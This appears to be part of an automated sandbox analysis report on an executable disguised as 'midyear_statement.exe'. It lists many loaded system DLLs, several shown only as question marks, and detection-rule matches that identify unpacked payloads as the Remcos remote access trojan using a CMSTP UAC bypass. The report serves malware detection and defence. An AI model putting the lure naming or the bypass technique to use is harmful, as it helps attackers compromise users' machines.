                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: winhttpcom.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\midyear_statement.exeSection loaded: ??.dllJump to behavior
                      Source: midyear_statement.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.5919e2.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 31.2.wkrriuhD.pif.590000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 24.2.wkrriuhD.pif.5919e2.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 33.2.wkrriuhD.pif.590000.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
